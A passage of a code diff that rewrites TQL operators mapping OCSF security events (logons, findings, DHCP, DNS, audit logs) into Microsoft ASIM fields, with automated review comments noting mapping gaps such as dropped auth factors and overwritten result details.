"Cached Remote Interactive" => { - asim.EventSubType = "RemoteInteractive" + $event.asim.EventSubType = "RemoteInteractive" } - "OS Service" => { asim.EventSubType = "Service" } + "OS Service" => { $event.asim.EventSubType = "Service"} _ => {} } -if ocsf.logon_type? != null { - asim.EventOriginalSubType = ocsf.logon_type +if $event.ocsf.logon_type? != null { + $event.asim.EventOriginalSubType = $event.ocsf.logon_type } -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? 
!= null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? -asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? -if ocsf.user?.domain? != null and ocsf.user?.name? != null { - asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" - asim.TargetUsernameType = "Windows" - asim.TargetDomain = ocsf.user.domain - asim.TargetDomainType = "Windows" +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.ActorSessionId = $event.ocsf.actor?.session?.uid? else $event.ocsf.actor?.session?.uid_alt? +$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid? +if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null { + $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}" + $event.asim.TargetUsernameType = "Windows" + $event.asim.TargetDomain = $event.ocsf.user.domain + $event.asim.TargetDomainType = "Windows" } -asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true -asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? -asim.SrcPortNumber = ocsf.src_endpoint?.port? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname? -asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid? -asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name? -asim.LogonProtocol = ocsf.auth_protocol? -if ocsf.auth_factors? 
!= null { - asim.LogonMethod = ocsf.auth_factors[0]?.factor_type? +$event.asim.TargetUserId = $event.ocsf.user?.uid? +$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true +$event.asim.TargetSessionId = $event.ocsf.session?.uid? else $event.ocsf.session?.uid_alt? +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? +$event.asim.SrcPortNumber = $event.ocsf.src_endpoint?.port? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? else $event.ocsf.device?.hostname? +$event.asim.TargetAppId = $event.ocsf.service?.uid? else $event.ocsf.dst_endpoint?.uid? +$event.asim.TargetAppName = $event.ocsf.service?.name? else $event.ocsf.dst_endpoint?.svc_name? +$event.asim.LogonProtocol = $event.ocsf.auth_protocol? +if $event.ocsf.auth_factors? != null { + $event.asim.LogonMethod = $event.ocsf.auth_factors[0]?.factor_type? } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/common.tql b/microsoft/operators/asim/ocsf/common.tql index bc61f84..7a5a597 100644 --- a/microsoft/operators/asim/ocsf/common.tql +++ b/microsoft/operators/asim/ocsf/common.tql 
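Review bot: `$event.asim.LogonMethod = $event.ocsf.auth_factors[0]?.factor_type?` keeps only the first factor, so a multi-factor session is exported as if it were single-factor — for an `Elevate` event that is precisely the attribute a "privilege elevation without MFA" detection would key on, and the rest of the list is dropped without trace. If ASIM's LogonMethod has to stay a single string, at least flag it, `// NOTE: only the first auth factor is exported; multi-factor sessions look single-factor downstream`, or carry the full list in an additional field. Relatedly, `ActorUsernameType`/`TargetUsernameType` are set only in the `domain\name` branch; when `email_addr` wins the fallback chain the type is presumably `"UPN"` and otherwise `"Simple"` (confirm against the ASIM UsernameType enumeration), and leaving it null makes the two formats indistinguishable to consumers.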
@@ -1,114 +1,117 @@ --- description: Initializes shared ASIM fields from a validated OCSF event. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -asim = {} +$event.asim.EventCount = 1 +$event.asim.EventStartTime = $event.ocsf.start_time? else $event.ocsf.time +$event.asim.EventEndTime = $event.ocsf.end_time? else $event.ocsf.time +$event.asim.EventProduct = $event.ocsf.metadata?.product?.name? else $event.ocsf.metadata?.product?.feature?.name? else "Unknown" +$event.asim.EventVendor = $event.ocsf.metadata?.product?.vendor_name? else "Microsoft" -asim.EventCount = 1 -asim.EventStartTime = ocsf.start_time? else ocsf.time -asim.EventEndTime = ocsf.end_time? else ocsf.time -asim.EventProduct = ocsf.metadata?.product?.name? else ocsf.metadata?.product?.feature?.name? else "Unknown" -asim.EventVendor = ocsf.metadata?.product?.vendor_name? else "Microsoft" - -if ocsf.metadata?.original_event_uid? != null { - asim.EventOriginalUid = ocsf.metadata.original_event_uid - asim.EventUid = ocsf.metadata.original_event_uid +if $event.ocsf.metadata?.original_event_uid? != null { + $event.asim.EventOriginalUid = $event.ocsf.metadata.original_event_uid + $event.asim.EventUid = $event.ocsf.metadata.original_event_uid } -if ocsf.metadata?.event_code? != null { - asim.EventOriginalType = ocsf.metadata.event_code +if $event.ocsf.metadata?.event_code? != null { + $event.asim.EventOriginalType = $event.ocsf.metadata.event_code } else { - asim.EventOriginalType = ocsf.type_uid.string() + $event.asim.EventOriginalType = $event.ocsf.type_uid.string() } -if ocsf.message? != null { - asim.EventMessage = ocsf.message +if $event.ocsf.message? != null { + $event.asim.EventMessage = $event.ocsf.message } -match ocsf.severity_id? { +match $event.ocsf.severity_id? 
{ 1 => { - asim.EventSeverity = "Informational" + $event.asim.EventSeverity = "Informational" } 2 => { - asim.EventSeverity = "Low" + $event.asim.EventSeverity = "Low" } 3 => { - asim.EventSeverity = "Medium" + $event.asim.EventSeverity = "Medium" } 4 => { - asim.EventSeverity = "High" + $event.asim.EventSeverity = "High" } 5 => { - asim.EventSeverity = "High" - asim.EventOriginalSeverity = ocsf.severity? else "Critical" + $event.asim.EventSeverity = "High" + $event.asim.EventOriginalSeverity = $event.ocsf.severity? else "Critical" } 6 => { - asim.EventSeverity = "High" - asim.EventOriginalSeverity = ocsf.severity? else "Fatal" + $event.asim.EventSeverity = "High" + $event.asim.EventOriginalSeverity = $event.ocsf.severity? else "Fatal" } - _ if ocsf.severity? == "Critical" or ocsf.severity? == "Fatal" => { - asim.EventSeverity = "High" - asim.EventOriginalSeverity = ocsf.severity + _ if $event.ocsf.severity? == "Critical" or $event.ocsf.severity? == "Fatal" => { + $event.asim.EventSeverity = "High" + $event.asim.EventOriginalSeverity = $event.ocsf.severity } - _ if ocsf.severity? in ["Informational", "Low", "Medium", "High"] => { - asim.EventSeverity = ocsf.severity + _ if $event.ocsf.severity? in ["Informational", "Low", "Medium", "High"] => { + $event.asim.EventSeverity = $event.ocsf.severity } - _ if ocsf.severity? != null => { - asim.EventOriginalSeverity = ocsf.severity + _ if $event.ocsf.severity? != null => { + $event.asim.EventOriginalSeverity = $event.ocsf.severity } _ => {} } -match ocsf.status? { +match $event.ocsf.status? { "Success" => { - asim.EventResult = "Success" + $event.asim.EventResult = "Success" } "Failure" => { - asim.EventResult = "Failure" + $event.asim.EventResult = "Failure" } "Partial" => { - asim.EventResult = "Partial" + $event.asim.EventResult = "Partial" } _ => { - match ocsf.status_id? 
{ - 1 if ocsf.class_uid != 2003 and ocsf.class_uid != 2004 and ocsf.class_uid != 2005 => { - asim.EventResult = "Success" + match $event.ocsf.status_id? { + 1 if $event.ocsf.class_uid != 2003 and $event.ocsf.class_uid != 2004 and $event.ocsf.class_uid != 2005 => { + $event.asim.EventResult = "Success" } 2 => { - asim.EventResult = "Failure" + $event.asim.EventResult = "Failure" } _ => { - asim.EventResult = "NA" + $event.asim.EventResult = "NA" } } } } -if ocsf.status_detail? != null { - asim.EventOriginalResultDetails = ocsf.status_detail +if $event.ocsf.status_detail? != null { + $event.asim.EventOriginalResultDetails = $event.ocsf.status_detail } -if ocsf.status_code? != null { - asim.EventOriginalResultDetails = ocsf.status_code.string() +if $event.ocsf.status_code? != null { + $event.asim.EventOriginalResultDetails = $event.ocsf.status_code.string() } -if ocsf.device?.hostname? != null { - asim.Dvc = ocsf.device.hostname - asim.DvcHostname = ocsf.device.hostname - asim.DvcFQDN = ocsf.device.hostname +if $event.ocsf.device?.hostname? != null { + $event.asim.Dvc = $event.ocsf.device.hostname + $event.asim.DvcHostname = $event.ocsf.device.hostname + $event.asim.DvcFQDN = $event.ocsf.device.hostname } -if ocsf.device?.uid? != null { - asim.DvcId = ocsf.device.uid +if $event.ocsf.device?.uid? != null { + $event.asim.DvcId = $event.ocsf.device.uid } -if ocsf.device?.ip? != null { - asim.DvcIpAddr = ocsf.device.ip - if asim.Dvc? == null { - asim.Dvc = ocsf.device.ip.string() +if $event.ocsf.device?.ip? != null { + $event.asim.DvcIpAddr = $event.ocsf.device.ip + if $event.asim.Dvc? == null { + $event.asim.Dvc = $event.ocsf.device.ip.string() } } -if asim.Dvc? == null { - asim.Dvc = asim.EventProduct +if $event.asim.Dvc? == null { + $event.asim.Dvc = $event.asim.EventProduct } -if ocsf.disposition? != null { - asim.DvcAction = ocsf.disposition +if $event.ocsf.disposition? != null { + $event.asim.DvcAction = $event.ocsf.disposition } -if ocsf.action? 
!= null { - asim.DvcAction = ocsf.action +if $event.ocsf.action? != null { + $event.asim.DvcAction = $event.ocsf.action } diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 901f1e2..1c5e35b 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql 
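Review bot: In the two `EventOriginalResultDetails` writes, the `status_code` branch unconditionally overwrites what the `status_detail` branch just stored, so an event carrying both loses the human-readable detail (e.g. the reason for a failed authentication) and keeps only the numeric code. Guard the second write, `if $event.ocsf.status_code? != null and $event.asim.EventOriginalResultDetails? == null {`, or fold both values into one string. `$event.asim.EventOriginalType = $event.ocsf.type_uid.string()` is also the only non-optional access in the operator; a record without `type_uid` fails here rather than mapping to null, which may be intended as strictness but deserves a comment. `DvcFQDN = $event.ocsf.device.hostname` assumes the hostname is fully qualified, which OCSF does not guarantee — a comment marking the assumption, or leaving DvcFQDN unset when the value has no dot, would avoid misleading joins on FQDN.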
@@ -7,43 +7,43 @@ args: type: field --- -assert $event.class_uid == 2003 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 2003 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.alert_event" -asim.EventSchema = "AlertEvent" -asim.EventSchemaVersion = "0.1" -asim.EventType = "Alert" -asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +$event.asim.EventSchema = "AlertEvent" +$event.asim.EventSchemaVersion = "0.1" +$event.asim.EventType = "Alert" +$event.asim.EventUid = $event.ocsf.finding_info?.uid? else $event.ocsf.metadata?.original_event_uid? -asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? -asim.EventSubType = "Compliance Violation" -asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? -asim.ThreatCategory = "Security Policy Violation" -asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? -asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? -asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true -match ocsf.status? { +$event.asim.AlertName = $event.ocsf.finding_info?.title? else $event.ocsf.message? +$event.asim.EventReportUrl = $event.ocsf.finding_info?.url? +$event.asim.EventSubType = "Compliance Violation" +$event.asim.ThreatName = $event.ocsf.malware?[0]?.name? else $event.ocsf.finding_info?.title? +$event.asim.ThreatCategory = "Security Policy Violation" +$event.asim.ThreatOriginalCategory = $event.ocsf.finding_info?.types?[0]? +$event.asim.Username = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? +$event.asim.UserId = $event.ocsf.user?.uid? else $event.ocsf.actor?.user?.uid? 
+$event.asim.UserIdType = "SID" if $event.asim.UserId?.starts_with("S-") == true +match $event.ocsf.status? { "New" | "Active" | "In Progress" => { - asim.AlertStatus = "Active" + $event.asim.AlertStatus = "Active" } "Resolved" | "Closed" => { - asim.AlertStatus = "Closed" + $event.asim.AlertStatus = "Closed" } _ => {} } -asim.AlertOriginalStatus = ocsf.status? -match ocsf.verdict? { - "True Positive" => { asim.AlertVerdict = "True Positive" } - "False Positive" => { asim.AlertVerdict = "False Positive" } - "Benign" => { asim.AlertVerdict = "Benign Positive" } - "Unknown" => { asim.AlertVerdict = "Unknown" } +$event.asim.AlertOriginalStatus = $event.ocsf.status? +match $event.ocsf.verdict? { + "True Positive" => { $event.asim.AlertVerdict = "True Positive"} + "False Positive" => { $event.asim.AlertVerdict = "False Positive"} + "Benign" => { $event.asim.AlertVerdict = "Benign Positive"} + "Unknown" => { $event.asim.AlertVerdict = "Unknown"} _ => {} } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 4721bdb..84a4edc 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -7,9 +7,9 @@ args: type: field --- -assert $event.class_uid == 2004 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 2004 let $threat_categories = { adware: "Adware", 
@@ -26,39 +26,39 @@ let $threat_categories = { worm: "Worm", } -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.alert_event" -asim.EventSchema = "AlertEvent" -asim.EventSchemaVersion = "0.1" -asim.EventType = "Alert" -asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +$event.asim.EventSchema = "AlertEvent" +$event.asim.EventSchemaVersion = "0.1" +$event.asim.EventType = "Alert" +$event.asim.EventUid = $event.ocsf.finding_info?.uid? else $event.ocsf.metadata?.original_event_uid? -asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? -asim.EventSubType = "Threat" -asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? -asim.ThreatCategory = $threat_categories[ocsf.finding_info?.types?[0]?.to_lower()]? -asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? -asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? -asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true -match ocsf.status? { +$event.asim.AlertName = $event.ocsf.finding_info?.title? else $event.ocsf.message? +$event.asim.EventReportUrl = $event.ocsf.finding_info?.url? +$event.asim.EventSubType = "Threat" +$event.asim.ThreatName = $event.ocsf.malware?[0]?.name? else $event.ocsf.finding_info?.title? +$event.asim.ThreatCategory = $threat_categories[$event.ocsf.finding_info?.types?[0]?.to_lower()]? +$event.asim.ThreatOriginalCategory = $event.ocsf.finding_info?.types?[0]? +$event.asim.Username = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? +$event.asim.UserId = $event.ocsf.user?.uid? else $event.ocsf.actor?.user?.uid? +$event.asim.UserIdType = "SID" if $event.asim.UserId?.starts_with("S-") == true +match $event.ocsf.status? 
{ "New" | "Active" | "In Progress" => { - asim.AlertStatus = "Active" + $event.asim.AlertStatus = "Active" } "Resolved" | "Closed" => { - asim.AlertStatus = "Closed" + $event.asim.AlertStatus = "Closed" } _ => {} } -asim.AlertOriginalStatus = ocsf.status? -match ocsf.verdict? { - "True Positive" => { asim.AlertVerdict = "True Positive" } - "False Positive" => { asim.AlertVerdict = "False Positive" } - "Benign" => { asim.AlertVerdict = "Benign Positive" } - "Unknown" => { asim.AlertVerdict = "Unknown" } +$event.asim.AlertOriginalStatus = $event.ocsf.status? +match $event.ocsf.verdict? { + "True Positive" => { $event.asim.AlertVerdict = "True Positive"} + "False Positive" => { $event.asim.AlertVerdict = "False Positive"} + "Benign" => { $event.asim.AlertVerdict = "Benign Positive"} + "Unknown" => { $event.asim.AlertVerdict = "Unknown"} _ => {} } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 8f0c046..dd5c959 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql 
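Review bot: `ThreatCategory` is derived from `finding_info?.types?[0]?` alone, and nothing from the finding's MITRE data reaches the ASIM record — if the incoming events populate `finding_info.attacks` (tactic/technique), that is discarded although the ASIM AlertEvent schema carries `AttackTactics`/`AttackTechniques` for it; either map it or note the gap, `// TODO: map finding_info.attacks to AttackTactics/AttackTechniques`. `$threat_categories[$event.ocsf.finding_info?.types?[0]?.to_lower()]?` calls `to_lower()` on a possibly-null index; confirm that yields null rather than an error, since findings without `types` are common. The `let $threat_categories` table this hunk depends on lives in the preceding hunk, outside this one.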
@@ -7,23 +7,23 @@ args: type: field --- -assert $event.class_uid == 4004 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 4004 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.dhcp_event" -asim.EventSchema = "DhcpEvent" -asim.EventSchemaVersion = "0.1.1" -match ocsf.activity_name { - "Ack" | "Offer" => { asim.EventType = "Assign" } - "Request" => { asim.EventType = "Renew" } - "Release" => { asim.EventType = "Release" } - _ => { asim.EventType = "Assign" } +$event.asim.EventSchema = "DhcpEvent" +$event.asim.EventSchemaVersion = "0.1.1" +match $event.ocsf.activity_name { + "Ack" | "Offer" => { $event.asim.EventType = "Assign"} + "Request" => { $event.asim.EventType = "Renew"} + "Release" => { $event.asim.EventType = "Release"} + _ => { $event.asim.EventType = "Assign"} } -asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.string() -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcMacAddr = ocsf.src_endpoint?.mac? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? else $event.ocsf.src_endpoint?.ip?.string() +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcMacAddr = $event.ocsf.src_endpoint?.mac? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 8f3a986..047dd04 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql 
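Review bot: The `_ => { $event.asim.EventType = "Assign"}` arm folds every unmatched DHCP activity — including negative ones such as `Nak`, `Decline` or `Expire` if the source emits them — into a successful-looking `Assign`, so a refused or expired lease reads as an address handout in downstream hunting. Either enumerate those activities with a non-Assign outcome, or keep the original activity alongside, `$event.asim.EventOriginalSubType = $event.ocsf.activity_name`, and comment the fallthrough: `// unmapped DHCP activities default to Assign; original activity in EventOriginalSubType`. The common operator only preserves `type_uid`/`event_code` as EventOriginalType, which is less direct for an analyst. `match $event.ocsf.activity_name {` is also unguarded while the other accesses in the file use `?`.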
@@ -7,28 +7,28 @@ args: type: field --- -assert $event.class_uid == 4003 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 4003 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.dns" -asim.EventSchema = "Dns" -asim.EventSchemaVersion = "0.1.7" -asim.EventType = ocsf.query?.opcode? else "Query" -match ocsf.activity_name { - "Query" => { asim.EventSubType = "request" } - "Response" => { asim.EventSubType = "response" } +$event.asim.EventSchema = "Dns" +$event.asim.EventSchemaVersion = "0.1.7" +$event.asim.EventType = $event.ocsf.query?.opcode? else "Query" +match $event.ocsf.activity_name { + "Query" => { $event.asim.EventSubType = "request"} + "Response" => { $event.asim.EventSubType = "response"} _ => {} } -asim.DnsQuery = ocsf.query?.hostname? -asim.DnsQueryTypeName = ocsf.query?.type? -asim.DnsQueryClassName = ocsf.query?.class? -asim.EventResultDetails = ocsf.rcode? else "NA" -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? -asim.DstIpAddr = ocsf.dst_endpoint?.ip? -asim.DstHostname = ocsf.dst_endpoint?.hostname? +$event.asim.DnsQuery = $event.ocsf.query?.hostname? +$event.asim.DnsQueryTypeName = $event.ocsf.query?.type? +$event.asim.DnsQueryClassName = $event.ocsf.query?.class? +$event.asim.EventResultDetails = $event.ocsf.rcode? else "NA" +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? +$event.asim.DstIpAddr = $event.ocsf.dst_endpoint?.ip? +$event.asim.DstHostname = $event.ocsf.dst_endpoint?.hostname? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 96d4d1c..fff7f60 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql 
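Review bot: The DNS mapper exports the query side only — nothing from the OCSF `answers` array (resolved addresses, CNAME chain) reaches an ASIM field, although the Dns schema has `DnsResponseName` for it, so a `response` event arrives without the data most DNS detections pivot on. If the package's OCSF events populate `answers`, add something like `$event.asim.DnsResponseName = $event.ocsf.answers?[0]?.rdata?` (confirm the attribute name against the OCSF dns_answer object and whether multiple answers should be joined); otherwise document the omission in the operator description. `match $event.ocsf.activity_name {` is unguarded, unlike every other field access in the hunk.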
@@ -7,42 +7,42 @@ args: type: field --- -assert $event.class_uid == 3004 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 3004 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.audit_event" -asim.EventSchema = "AuditEvent" -asim.EventSchemaVersion = "0.1.2" -asim.EventType = "Other" -match ocsf.activity_name { - "Create" => { asim.EventType = "Create" } - "Read" => { asim.EventType = "Read" } - "Update" | "Set" => { asim.EventType = "Set" } - "Delete" => { asim.EventType = "Delete" } - "Execute" => { asim.EventType = "Execute" } - "Install" => { asim.EventType = "Install" } - "Clear" => { asim.EventType = "Clear" } - "Enable" => { asim.EventType = "Enable" } - "Disable" => { asim.EventType = "Disable" } - "Start" => { asim.EventType = "Start" } - "Stop" => { asim.EventType = "Stop" } +$event.asim.EventSchema = "AuditEvent" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventType = "Other" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "Create"} + "Read" => { $event.asim.EventType = "Read"} + "Update" | "Set" => { $event.asim.EventType = "Set"} + "Delete" => { $event.asim.EventType = "Delete"} + "Execute" => { $event.asim.EventType = "Execute"} + "Install" => { $event.asim.EventType = "Install"} + "Clear" => { $event.asim.EventType = "Clear"} + "Enable" => { $event.asim.EventType = "Enable"} + "Disable" => { $event.asim.EventType = "Disable"} + "Start" => { $event.asim.EventType = "Start"} + "Stop" => { $event.asim.EventType = "Stop"} _ => {} } -asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType -asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -asim.ObjectType = "Directory Service Object" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? 
else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType +$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path? +$event.asim.ObjectType = "Directory Service Object" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? -asim.TargetIpAddr = ocsf.dst_endpoint?.ip? +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? +$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 8b5f78d..2fe1d92 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql 
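Review bot: `match $event.ocsf.activity_name {` reads the field without `?`, while two lines later `$event.asim.Operation = $event.ocsf.activity_name? else ...` treats it as optional; the two disagree on whether an event without `activity_name` is acceptable, and the match presumably fails before the fallback is ever reached. `match $event.ocsf.activity_name? {` with the existing `_ => {}` arm keeps the `"Other"` default and makes the fallback meaningful. Aside from `ObjectType`, this body is byte-for-byte the same as event_log_activity.tql in this patch; a shared audit helper taking the object type as an argument would keep the two from drifting.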
+++ b/microsoft/operators/asim/ocsf/event_log_activity.tql 
@@ -7,42 +7,42 @@ args: type: field --- -assert $event.class_uid == 1008 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 1008 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.audit_event" -asim.EventSchema = "AuditEvent" -asim.EventSchemaVersion = "0.1.2" -asim.EventType = "Other" -match ocsf.activity_name { - "Create" => { asim.EventType = "Create" } - "Read" => { asim.EventType = "Read" } - "Update" | "Set" => { asim.EventType = "Set" } - "Delete" => { asim.EventType = "Delete" } - "Execute" => { asim.EventType = "Execute" } - "Install" => { asim.EventType = "Install" } - "Clear" => { asim.EventType = "Clear" } - "Enable" => { asim.EventType = "Enable" } - "Disable" => { asim.EventType = "Disable" } - "Start" => { asim.EventType = "Start" } - "Stop" => { asim.EventType = "Stop" } +$event.asim.EventSchema = "AuditEvent" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventType = "Other" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "Create"} + "Read" => { $event.asim.EventType = "Read"} + "Update" | "Set" => { $event.asim.EventType = "Set"} + "Delete" => { $event.asim.EventType = "Delete"} + "Execute" => { $event.asim.EventType = "Execute"} + "Install" => { $event.asim.EventType = "Install"} + "Clear" => { $event.asim.EventType = "Clear"} + "Enable" => { $event.asim.EventType = "Enable"} + "Disable" => { $event.asim.EventType = "Disable"} + "Start" => { $event.asim.EventType = "Start"} + "Stop" => { $event.asim.EventType = "Stop"} _ => {} } -asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType -asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -asim.ObjectType = "Event Log" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? 
